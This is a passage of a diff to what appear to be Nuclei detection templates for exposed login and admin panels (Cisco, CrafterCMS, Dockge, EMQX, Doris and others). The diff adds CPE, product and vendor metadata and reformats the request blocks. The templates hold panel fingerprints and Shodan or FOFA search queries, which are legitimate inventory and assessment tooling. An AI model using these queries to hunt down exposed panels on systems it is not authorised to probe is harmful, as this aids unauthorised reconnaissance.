type: dsl - dsl: - - 'status_code == 200' - - 'contains_any(to_lower(body), "cisco expressway", "cisco expway")' - condition: and - - extractors: - - type: regex - part: body - group: 1 - regex: + classification: + cpe: cpe:2.3:a:cisco:expressway_software:*:*:*:*:*:*:*:* +http: + - method: GET + path: + - "{{BaseURL}}/login" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "cisco expressway", "cisco expway")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: - 'Cisco\s+(?:Expressway|Expway)\s+([A-Za-z\s]+)<\/legend>' -# digest: 4a0a0047304502203b4103643e4409006f1d2d4a3239769a7db97ab09eff66de20c2573d84127caf022100bd535e00d309f0cba2c2f237f6120b8369a13e92533fef3e0b21d03757d9bedc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203b4103643e4409006f1d2d4a3239769a7db97ab09eff66de20c2573d84127caf022100bd535e00d309f0cba2c2f237f6120b8369a13e92533fef3e0b21d03757d9bedc:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/cisco/cisco-telepresence.yaml b/http/exposed-panels/cisco/cisco-telepresence.yaml index bdcfe23092..6a19fb74a2 100644 --- a/http/exposed-panels/cisco/cisco-telepresence.yaml +++ b/http/exposed-panels/cisco/cisco-telepresence.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:cisco:telepresence_tc:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.title:"Cisco Telepresence" + product: telepresence_tc + vendor: cisco tags: panel,cisco http: @@ -32,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f649be6fea4bce0d982ef8a1d675dd3ae50dc6fb7b1f4ac345cb87a2f1f31c0602210087028f358bef32720c4466aa8ddaa46b7b828f8de5842aa47edfb47bfcfef145:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f649be6fea4bce0d982ef8a1d675dd3ae50dc6fb7b1f4ac345cb87a2f1f31c0602210087028f358bef32720c4466aa8ddaa46b7b828f8de5842aa47edfb47bfcfef145:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/concourse-ci-panel.yaml b/http/exposed-panels/concourse-ci-panel.yaml index a388bbc4a7..a56ff9a617 100644 --- a/http/exposed-panels/concourse-ci-panel.yaml +++ b/http/exposed-panels/concourse-ci-panel.yaml @@ -11,9 +11,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:pivotal_software:concourse:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"Concourse" + product: concourse + vendor: pivotal_software tags: panel,concourse,oss http: @@ -27,4 +30,4 @@ http: - '<title>Concourse' - 'login to Concourse' condition: or -# digest: 4a0a00473045022100951ee80912c5d659099c9bb20a389aa2c4802edeef46a381d07f067c067cfef802200be4ae477b82e1cd00c6696e1a698c16ef0610e9b0331b4f9eda57e9329b132a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100951ee80912c5d659099c9bb20a389aa2c4802edeef46a381d07f067c067cfef802200be4ae477b82e1cd00c6696e1a698c16ef0610e9b0331b4f9eda57e9329b132a:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/craftercms-panel.yaml b/http/exposed-panels/craftercms-panel.yaml index 7b37d6a3d0..5bf3d39266 100644 --- a/http/exposed-panels/craftercms-panel.yaml +++ b/http/exposed-panels/craftercms-panel.yaml @@ -1,5 +1,5 @@ -id: craftercms-panel - +id: craftercms-panel + info: name: CrafterCMS Login Panel - Detect author: righettod @@ -12,24 +12,28 @@ info: verified: true max-request: 1 shodan-query: http.title:"craftercms" + product: craftercms + vendor: craftercms tags: panel,craftercms,login,detect -http: - - method: GET - path: - - "{{BaseURL}}/studio/login" - - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains_any(to_lower(body), "craftercmsnext", "login - craftercms", "crafter software corporation")' - condition: and - - extractors: - - type: regex - part: body - group: 1 - regex: + classification: + cpe: cpe:2.3:a:craftercms:craftercms:*:*:*:*:*:*:*:* +http: + - method: GET + path: + - "{{BaseURL}}/studio/login" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "craftercmsnext", "login - craftercms", "crafter software corporation")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: - 'Copyright\s+\(C\)\s+([0-9-]+)\s+Crafter' -# digest: 4a0a0047304502204ce552931d7737fb1635c321e804d44d3260ba2e52e0b232f6876572ee1a49f502210090a61f8f7f890463f9952689fe0e563bb0fa9ab55e5e309d8f6e89417e399ab4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204ce552931d7737fb1635c321e804d44d3260ba2e52e0b232f6876572ee1a49f502210090a61f8f7f890463f9952689fe0e563bb0fa9ab55e5e309d8f6e89417e399ab4:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/cwp-webpanel.yaml b/http/exposed-panels/cwp-webpanel.yaml index a765647397..2fe264c790 100644 --- a/http/exposed-panels/cwp-webpanel.yaml +++ b/http/exposed-panels/cwp-webpanel.yaml @@ -8,9 +8,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:control-webpanel:webpanel:*:*:*:*:*:*:*:* metadata: max-request: 1 fofa-query: title=="CWP |用户" || title=="Login | CentOS WebPanel" || body="CentOS WebPanel" + product: webpanel + vendor: control-webpanel tags: panel,centos http: @@ -36,4 +39,4 @@ http: part: header words: - "cwpsrv" -# digest: 490a00463044022043f413721afb305cc34fc52fd63b673f4e3c0980eed91b07a28d96a327d0cd6102206f9abc98bc3b795ffbb04a60846cf014b716da1f2e9d20fbee3603c831a2f952:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022043f413721afb305cc34fc52fd63b673f4e3c0980eed91b07a28d96a327d0cd6102206f9abc98bc3b795ffbb04a60846cf014b716da1f2e9d20fbee3603c831a2f952:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/cyberchef-panel.yaml b/http/exposed-panels/cyberchef-panel.yaml index 1a03e5670e..114ea05aca 100644 --- a/http/exposed-panels/cyberchef-panel.yaml +++ b/http/exposed-panels/cyberchef-panel.yaml @@ -1,5 +1,5 @@ -id: cyberchef-panel - +id: cyberchef-panel + info: name: Cyber Chef Panel - Detect author: rxerium @@ -12,26 +12,30 @@ info: verified: true max-request: 1 shodan-query: title:"CyberChef" + product: cyberchef + vendor: gchq tags: panel,cyberchef,login,detect -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'CyberChef' - - 'The Cyber Swiss Army Knife' - condition: and - - - type: status - status: + classification: + cpe: cpe:2.3:a:gchq:cyberchef:*:*:*:*:*:*:*:* +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'CyberChef' + - 'The Cyber Swiss Army Knife' + condition: and + + - type: status + status: - 200 -# digest: 4b0a00483046022100bf630ba5f09138ed72141fc26d9655fe87a87bcfd945f7d45076e0be1a6dc7f6022100971232301e42001ae83d0d5534dc43ade2fb39ff38cf5f20412e0257d255d250:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bf630ba5f09138ed72141fc26d9655fe87a87bcfd945f7d45076e0be1a6dc7f6022100971232301e42001ae83d0d5534dc43ade2fb39ff38cf5f20412e0257d255d250:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/dahua-web-panel.yaml b/http/exposed-panels/dahua-web-panel.yaml index 1c830b1686..81c3951645 100644 --- a/http/exposed-panels/dahua-web-panel.yaml +++ b/http/exposed-panels/dahua-web-panel.yaml @@ -10,10 +10,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:h:dahuasecurity:sd22204db-gny-w:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.favicon.hash:1653394551 + product: sd22204db-gny-w + vendor: dahuasecurity tags: edb,panel,dahua,detect http: @@ -30,4 +33,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202439e0b33f565bb29d258453ea7975fc89f2540acdee02604e1512c585b3d2690220406689fe81cab29d8748aea5ab8e8f9980077909750197e7c6b834046d75461b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202439e0b33f565bb29d258453ea7975fc89f2540acdee02604e1512c585b3d2690220406689fe81cab29d8748aea5ab8e8f9980077909750197e7c6b834046d75461b:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/dataiku-panel.yaml b/http/exposed-panels/dataiku-panel.yaml index 1f68d630b0..4cfb6b8e7e 100644 --- a/http/exposed-panels/dataiku-panel.yaml +++ b/http/exposed-panels/dataiku-panel.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:dataiku:data_science_studio:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"dataiku" + product: data_science_studio + vendor: dataiku tags: panel,dataiku http: @@ -29,4 +32,4 @@ http: part: header words: - "text/html" -# digest: 4a0a00473045022100bf930e53c220ef10054e30544f10f8da6c39735dc37a4fcb5617e89b846126560220587db0c30779629768374cc267eba9fa2a4cb539b19afdfd1fadb68af537d6ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bf930e53c220ef10054e30544f10f8da6c39735dc37a4fcb5617e89b846126560220587db0c30779629768374cc267eba9fa2a4cb539b19afdfd1fadb68af537d6ba:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/defectdojo-panel.yaml b/http/exposed-panels/defectdojo-panel.yaml index 2bcb15a74e..b8de7baa86 100644 --- a/http/exposed-panels/defectdojo-panel.yaml +++ b/http/exposed-panels/defectdojo-panel.yaml @@ -8,9 +8,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:owasp:defectdojo:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: html:"DefectDojo Logo" + product: defectdojo + vendor: owasp tags: panel,defectdojo http: @@ -22,4 +25,4 @@ http: - type: word words: - "\"DefectDojoLog In' - 'device/logOff_up_menu1.htm' condition: and -# digest: 4a0a004730450220406604d496ef45c46bba234b4b4e555f5d3606b76199500607ea37e6b42963c5022100a54d5d5a3885b512b8e7765b860bc3835ebd666339f0ff80e82b8731d3a320c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220406604d496ef45c46bba234b4b4e555f5d3606b76199500607ea37e6b42963c5022100a54d5d5a3885b512b8e7765b860bc3835ebd666339f0ff80e82b8731d3a320c0:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/dialogic-xms-console.yaml b/http/exposed-panels/dialogic-xms-console.yaml index c877417831..7df0a85efa 100644 --- a/http/exposed-panels/dialogic-xms-console.yaml +++ b/http/exposed-panels/dialogic-xms-console.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: title:"Dialogic XMS Admin Console" + product: powermedia_xms + vendor: dialogic tags: panel,dialogic,admin,login,detect + classification: + cpe: cpe:2.3:a:dialogic:powermedia_xms:*:*:*:*:*:*:*:* http: - method: GET path: @@ -25,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204578749594ab0de3efbed02e03712e1574900fdacebe35c859373035b07c1cd1022100f3876c7944b735829649627acc9e128ac5f3b2d128043e3b2aca0566c262acd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204578749594ab0de3efbed02e03712e1574900fdacebe35c859373035b07c1cd1022100f3876c7944b735829649627acc9e128ac5f3b2d128043e3b2aca0566c262acd8:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/directum-login.yaml b/http/exposed-panels/directum-login.yaml index 120816bcde..441d28ab8a 100644 --- a/http/exposed-panels/directum-login.yaml +++ b/http/exposed-panels/directum-login.yaml @@ -8,9 +8,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:directum:directum:*:*:*:*:*:*:*:* metadata: max-request: 1 fofa-query: title="Directum" + product: directum + vendor: directum tags: directum,panel http: @@ -30,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100905eb3c031666559f9fc3152d9969edafa77f3e939bc4fbb79210e608dec1ac8022100a7c3633d4fa725c729c7cd4293beae25593003903f16a63cc37f2dc06f194681:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100905eb3c031666559f9fc3152d9969edafa77f3e939bc4fbb79210e608dec1ac8022100a7c3633d4fa725c729c7cd4293beae25593003903f16a63cc37f2dc06f194681:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/discuz-panel.yaml b/http/exposed-panels/discuz-panel.yaml index 6750b892c9..8efafeb675 100644 --- a/http/exposed-panels/discuz-panel.yaml +++ b/http/exposed-panels/discuz-panel.yaml @@ -9,8 +9,12 @@ info: max-request: 1 shodan-query: title:"Discuz!" fofa-query: title="Discuz!" + product: discuz\\! + vendor: comsenz tags: panel,discuz,detect,login + classification: + cpe: cpe:2.3:a:comsenz:discuz\\!:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +39,4 @@ http: group: 1 regex: - 'X([0-9.]+)<\/em><\/p>' -# digest: 4b0a0048304602210097a74f17ffb2b4e647c84c9056f480dab7093104577773000185b34a1ab7054e0221008c8448bbe03ed2c17134c6cf727d1625726145b2a3046bd08104430ff5020e48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210097a74f17ffb2b4e647c84c9056f480dab7093104577773000185b34a1ab7054e0221008c8448bbe03ed2c17134c6cf727d1625726145b2a3046bd08104430ff5020e48:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/docebo-elearning-panel.yaml b/http/exposed-panels/docebo-elearning-panel.yaml index c9a1cb0bf7..b1f29be8f5 100644 --- a/http/exposed-panels/docebo-elearning-panel.yaml +++ b/http/exposed-panels/docebo-elearning-panel.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:docebo:docebo:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 fofa-query: title="Docebo E-learning" + product: docebo + vendor: docebo tags: panel,docebo http: @@ -29,4 +32,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022032c2d41fe6ab303a2af0be0252600a10441157240717877684003563cb062e09022013427980fce1b8f2e1f41d4bd2854b07cf35c046bc7c8f4877a097a3e09d9256:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022032c2d41fe6ab303a2af0be0252600a10441157240717877684003563cb062e09022013427980fce1b8f2e1f41d4bd2854b07cf35c046bc7c8f4877a097a3e09d9256:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/dockge-panel.yaml b/http/exposed-panels/dockge-panel.yaml index e042b3ec5e..b814e8ed5f 100644 --- a/http/exposed-panels/dockge-panel.yaml +++ b/http/exposed-panels/dockge-panel.yaml @@ -1,5 +1,5 @@ -id: dockge-panel - +id: dockge-panel + info: name: Dockge Panel - Detect author: rxerium @@ -13,23 +13,27 @@ info: verified: true max-request: 1 shodan-query: title:"Dockge" + product: dockge + vendor: dockge.kuma tags: panel,dockge,login -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Dockge' - - - type: status - status: + classification: + cpe: cpe:2.3:a:dockge.kuma:dockge:*:*:*:*:*:*:*:* +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Dockge' + + - type: status + status: - 200 -# digest: 4a0a004730450220261b74576baba68fc27370f9ad1b57ffba4ea3d4efdb86e1a50e30c8d745b831022100da02f9365545cba8f261a052ecb4b758d2ac95b1d72d03c7303dd3982e2a623f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220261b74576baba68fc27370f9ad1b57ffba4ea3d4efdb86e1a50e30c8d745b831022100da02f9365545cba8f261a052ecb4b758d2ac95b1d72d03c7303dd3982e2a623f:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/dokuwiki-panel.yaml b/http/exposed-panels/dokuwiki-panel.yaml index 75c81600a6..99a0d4f601 100644 --- a/http/exposed-panels/dokuwiki-panel.yaml +++ b/http/exposed-panels/dokuwiki-panel.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: http.html:"/dokuwiki/" + product: dokuwiki + vendor: dokuwiki tags: panel,dokuwiki,login + classification: + cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:* http: - method: GET path: @@ -25,4 +29,4 @@ http: - 'status_code == 200' - 'contains_any(body, "dokuwiki__header", "content=\"DokuWiki", "/dokuwiki/")' condition: and -# digest: 4b0a0048304602210098f8ad2f891fcec698d9ee9905ad409416c125e1d7ee9677e68b884c3b046d38022100d49af03fbf040d2dbcc1421f61270a2c03c143b8b47897c4660a5633a78b1ed7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210098f8ad2f891fcec698d9ee9905ad409416c125e1d7ee9677e68b884c3b046d38022100d49af03fbf040d2dbcc1421f61270a2c03c143b8b47897c4660a5633a78b1ed7:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/doris-panel.yaml b/http/exposed-panels/doris-panel.yaml index 2048801147..da3481df8c 100644 --- a/http/exposed-panels/doris-panel.yaml +++ b/http/exposed-panels/doris-panel.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:24048806 + product: doris + vendor: apache tags: doris,panel,login,detect + classification: + cpe: cpe:2.3:a:apache:doris:*:*:*:*:*:*:*:* http: - method: GET path: @@ -28,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bd68dfe5d1e6c61141aafdf31b9017aafb7b3327c6d0624083b99a164c801806022024d35f5c9e4860e4d8316fbcabc0eae8c139454fc8efc1ac853b5c130784f593:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bd68dfe5d1e6c61141aafdf31b9017aafb7b3327c6d0624083b99a164c801806022024d35f5c9e4860e4d8316fbcabc0eae8c139454fc8efc1ac853b5c130784f593:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/dradis-pro-panel.yaml b/http/exposed-panels/dradis-pro-panel.yaml index e13e172f2d..7e2069d5da 100644 --- a/http/exposed-panels/dradis-pro-panel.yaml +++ b/http/exposed-panels/dradis-pro-panel.yaml @@ -10,10 +10,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:dradisframework:dradis:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"Dradis Professional Edition" + product: dradis + vendor: dradisframework tags: panel,dradis http: @@ -31,4 +34,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100804c41629c7df6973f57cde7de7a3fc5c6b111b7bbc65c9a48164c05490d9883022100dad881ab36d15504a3d75206020349b45fbd087d124cb6c81d8bba9b00faffae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100804c41629c7df6973f57cde7de7a3fc5c6b111b7bbc65c9a48164c05490d9883022100dad881ab36d15504a3d75206020349b45fbd087d124cb6c81d8bba9b00faffae:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/eclipse-birt-panel.yaml b/http/exposed-panels/eclipse-birt-panel.yaml index 0d711e9a26..2c451abaee 100644 --- a/http/exposed-panels/eclipse-birt-panel.yaml +++ b/http/exposed-panels/eclipse-birt-panel.yaml @@ -10,11 +10,14 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:eclipse:business_intelligence_and_reporting_tools:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: title:"Eclipse BIRT Home" google-query: intitle:"Eclipse BIRT Home" + product: business_intelligence_and_reporting_tools + vendor: eclipse tags: panel,eclipsebirt,detect http: @@ -46,4 +49,4 @@ http: group: 1 regex: - 'Viewer Version : ([0-9.-]+)' -# digest: 4b0a00483046022100bac974de8aad2121a7c20001a98a4529efc8403fa35c7a8a467f2fd31f58d2a9022100f7e3c06ec40a41ff7cfce14520a7d36e5f1f2bd8563da22b83e07e9b04ccbe9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bac974de8aad2121a7c20001a98a4529efc8403fa35c7a8a467f2fd31f58d2a9022100f7e3c06ec40a41ff7cfce14520a7d36e5f1f2bd8563da22b83e07e9b04ccbe9b:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/emqx-panel.yaml b/http/exposed-panels/emqx-panel.yaml index 66cdb68d02..4e8d4c5d81 100644 --- a/http/exposed-panels/emqx-panel.yaml +++ b/http/exposed-panels/emqx-panel.yaml @@ -1,5 +1,5 @@ -id: emqx-panel - +id: emqx-panel + info: name: EMQX Login Panel - Detect author: righettod @@ -12,24 +12,28 @@ info: verified: true max-request: 1 shodan-query: http.title:"EMQX Dashboard" + product: emqx + vendor: emqx tags: panel,emqx,login,detect -http: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains_any(to_lower(body), "emqx dashboard", "emqx-dashboard")' - condition: and - - extractors: - - type: regex - part: body - group: 1 - regex: + classification: + cpe: cpe:2.3:a:emqx:emqx:*:*:*:*:*:*:*:* +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "<title>emqx dashboard", "emqx-dashboard")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: - 'but\s+(emqx\-dashboard[0-9a-z\-]+)' -# digest: 4b0a004830460221009efc84e19cc4d6dc6aefc4609111f91658caaee5cd8d556bc85e80b944679bd7022100de8c23742fb4a26187f99ab6e36c683ed2d315b2eccd678526331c575eede3d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009efc84e19cc4d6dc6aefc4609111f91658caaee5cd8d556bc85e80b944679bd7022100de8c23742fb4a26187f99ab6e36c683ed2d315b2eccd678526331c575eede3d2:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/ems-webclient-panel.yaml b/http/exposed-panels/ems-webclient-panel.yaml index c80a9dd515..b9221f3303 100644 --- a/http/exposed-panels/ems-webclient-panel.yaml +++ b/http/exposed-panels/ems-webclient-panel.yaml @@ -8,9 +8,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:ems_project:ems:*:*:*:*:*:*:*:* metadata: max-request: 2 google-query: inurl:EMSWebClient/ + product: ems + vendor: ems_project tags: panel,ems http: @@ -38,4 +41,4 @@ http: group: 1 regex: - 'Web Client Version (.*)</span>' -# digest: 4a0a0047304502204b03859673af444ed70f804498b0a6948b3887530f743dfd9428de0994ad14aa022100cf9eac5ba5f87206dcf0f843106591cc45ce206269e7696c7526f6728fc87739:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204b03859673af444ed70f804498b0a6948b3887530f743dfd9428de0994ad14aa022100cf9eac5ba5f87206dcf0f843106591cc45ce206269e7696c7526f6728fc87739:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/endpoint-protector-panel.yaml b/http/exposed-panels/endpoint-protector-panel.yaml index be4306f423..ad41d62a83 100644 --- a/http/exposed-panels/endpoint-protector-panel.yaml +++ b/http/exposed-panels/endpoint-protector-panel.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 shodan-query: http.title:"Endpoint Protector" + product: endpoint_protector + vendor: cososys tags: panel,endpoint,login,detect,endpoint-protector + classification: + cpe: cpe:2.3:a:cososys:endpoint_protector:*:*:*:*:*:*:*:* http: - method: GET path: @@ -26,4 +30,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009bed4da4e4da5599414a6573824bd26d9fd3302ec152617475d9e080e2f7f00b0220033c2ad43304d74f0c0c75ac824107d5b6f40a0d9f4aa352825c15d3621d3383:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009bed4da4e4da5599414a6573824bd26d9fd3302ec152617475d9e080e2f7f00b0220033c2ad43304d74f0c0c75ac824107d5b6f40a0d9f4aa352825c15d3621d3383:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/episerver-panel.yaml b/http/exposed-panels/episerver-panel.yaml index 2f9ca4d384..79524d9ee4 100644 --- a/http/exposed-panels/episerver-panel.yaml +++ b/http/exposed-panels/episerver-panel.yaml @@ -10,10 +10,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:episerver:episerver:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: html:"epihash" + product: episerver + vendor: episerver tags: panel,optimizely,episerver http: @@ -31,4 +34,4 @@ http: - type: status status: - 302 -# digest: 4a0a0047304502205825465e89cd4f68687b497aae1808ec62afa95dc33b940b0c35d3354b0f7860022100b7220cbd1ab486e3c3116d0d6b8173222fabde5289bac8eaf5ccf7cedf6dbc50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205825465e89cd4f68687b497aae1808ec62afa95dc33b940b0c35d3354b0f7860022100b7220cbd1ab486e3c3116d0d6b8173222fabde5289bac8eaf5ccf7cedf6dbc50:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/ez-publish-panel.yaml b/http/exposed-panels/ez-publish-panel.yaml index 452d0c2c38..bab4a64cf5 100644 --- a/http/exposed-panels/ez-publish-panel.yaml +++ b/http/exposed-panels/ez-publish-panel.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:ez:ez_publish:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.html:"eZ Publish" + product: ez_publish + vendor: ez tags: panel,ez http: @@ -34,4 +37,4 @@ http: part: header words: - 'eZ Publish' -# digest: 4b0a004830460221008358c16c81a78e9ca2dda8a05eb067439f54e7f42ad0b5c4a61d598f51992e60022100d878f3a32d6e1c5d4f83011a45741f52a7b2193eeecc5ee6176c1dda46e7732c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008358c16c81a78e9ca2dda8a05eb067439f54e7f42ad0b5c4a61d598f51992e60022100d878f3a32d6e1c5d4f83011a45741f52a7b2193eeecc5ee6176c1dda46e7732c:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/faraday-login.yaml b/http/exposed-panels/faraday-login.yaml index b374e9897d..3dbf55667b 100644 --- a/http/exposed-panels/faraday-login.yaml +++ b/http/exposed-panels/faraday-login.yaml @@ -8,9 +8,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:faraday_project:faraday:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: html:"faradayApp" + product: faraday + vendor: faraday_project tags: panel,faraday http: @@ -27,4 +30,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220222cc701a3c28bac084fe94b8fb9382b75edf900bd31cdf0f8b22b25f158a50402204017a37edc30627d033a8207be9c562fec28fef577f9aa178e3c128110e9ca7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220222cc701a3c28bac084fe94b8fb9382b75edf900bd31cdf0f8b22b25f158a50402204017a37edc30627d033a8207be9c562fec28fef577f9aa178e3c128110e9ca7f:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/footprints-panel.yaml b/http/exposed-panels/footprints-panel.yaml index 36262f4c89..768121ae3a 100644 --- a/http/exposed-panels/footprints-panel.yaml +++ b/http/exposed-panels/footprints-panel.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:bmc:footprints_service_core:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: title:"FootPrints Service Core Login" + product: footprints_service_core + vendor: bmc tags: 